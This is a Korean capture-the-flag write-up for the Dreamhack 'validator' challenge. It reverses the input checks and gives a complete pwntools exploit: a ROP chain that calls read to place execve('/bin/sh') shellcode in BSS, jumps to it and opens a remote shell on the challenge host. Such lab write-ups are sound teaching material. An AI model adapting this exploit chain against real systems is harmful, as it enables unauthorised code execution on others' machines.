validator

---

validator

문제 풀이

?? 빨간 바이너리?

보호기법이 거의 없다고 할 정도네요..?
참고로 이번 문제는 바이너리만 주어서 이렇게 IDA를 사용했습니당

기본적으론 위와 같이 형성되어 있습니다 emeset을 한 후 validate 함수를 실행하네요
그 인자로는 s와 128을 주고요

해당 validate 함수

각 반복문마다 조건문이 있네요

해당 조건문 중 하나인데

주석으로 DREAMHACK이라고 알려주네요..
리버싱 못하는데 감사합니다 ㅠㅠ

우선 인자로 넘긴 배열이 DREAMHACK!으로 시작하며, 위에 함수에서
j = 11부터 j < 0x128만큼 s의 각 문자가 없어지나요?

먼저 입력 값에 대해 DREAMHACK! 문자열과 한 바이트씩 비교하고, 9 개의 문자 중 동일하지 않은
문자가 있다면 exit 함수를 통해 프로그램을 종료합니다.

위 조건을 만족하면 사용자가 입력한 문자열에서
첫 번째 문자가 두 번째 문자와 1을 더한 값이랑 동일한지 비교합니다.

이 과정을 반복문을 통해 128번만큼 비교하게됩니다.
만약 128번 루프 동안 해당 조건을 만족하지 못한다면 exit 함수를 통해 프로그램을 종료합니다.

이를 다 통과해야 뒤에 덧붙인 오버플로우가 되겠군요..

---

Exploit 설계

아무리 생각해도.. 뭐지? 싶네요 path 경로 조작같았는데..
또 OverWrite인가요 ㅠㅠ

shellcode를 BSS영역에 넣어서 RTL 형식으로 하면 될 듯 합니다
먼저 먼저 두 개의 조건을 만족하는 문자열을 생성하는 코드는 다음과 같습니다.

payload = "DREAMHACK!"

for i in range(0xff, 0xff-126, -1):
 payload += chr(i)

이걸로 백날해봤자 byte error 뜨는데 하.. 저걸로 해도 비슷하긴 하던데

이렇게 찾아서 다 넣었습니다 직접 주소를..

그리고 shell의 주소를 직접 짜던가 찾던가 shellcraft를 사용하던가인데
저는 pwn에서 있는 거 사용했습니다 sh나 execve도 다 시도 해보았습니다.

나머지는 RTL에서 했던 내용이므로 큰 설명은 하지 않겠습니다.

---

Exploit

위에서 다 설명했으니 추가적인 부분만 간단히 설명하고 넘어가겠습니다.

from pwn import *
 
context.arch = 'x86_64'
 
p = remote("host3.dreamhack.games", 22292)
 
payload = b"DREAMHACK!"
 
for i in range(0xff, 0xff-126, -1):
    #payload += chr(i)
    payload += i.to_bytes(1, byteorder='little')
 
poprdi = 0x4006f3
poprsir15 = 0x4006f1
poprdx = 0x40057b
bss = 0x60104B
read_plt = 0x400470
 
#shellcode = asm(shellcraft.sh())
shellcode = asm(shellcraft.execve("/bin/sh",0,0))
 
payload += p64(poprdi)
payload += p64(0)
 
payload += p64(poprsir15)
payload += p64(bss)
payload += p64(0)       
 
payload += p64(poprdx)
payload += p64(len(shellcode))
 
payload += p64(read_plt)
payload += p64(bss)
 
p.sendline(payload)
 
#pause() # or sleep
 
p.sendline(shellcode)
 
p.interactive()
 

이 쉬운 문제를 쌉질을 와 ㅋㅋ 진짜 다시 생각해도 빡치면서 짜릿했네요
좀만 더 했으면 과제 미납이였네요 와우 ㅋㅋ

---

참고 자료

 

참고 이미지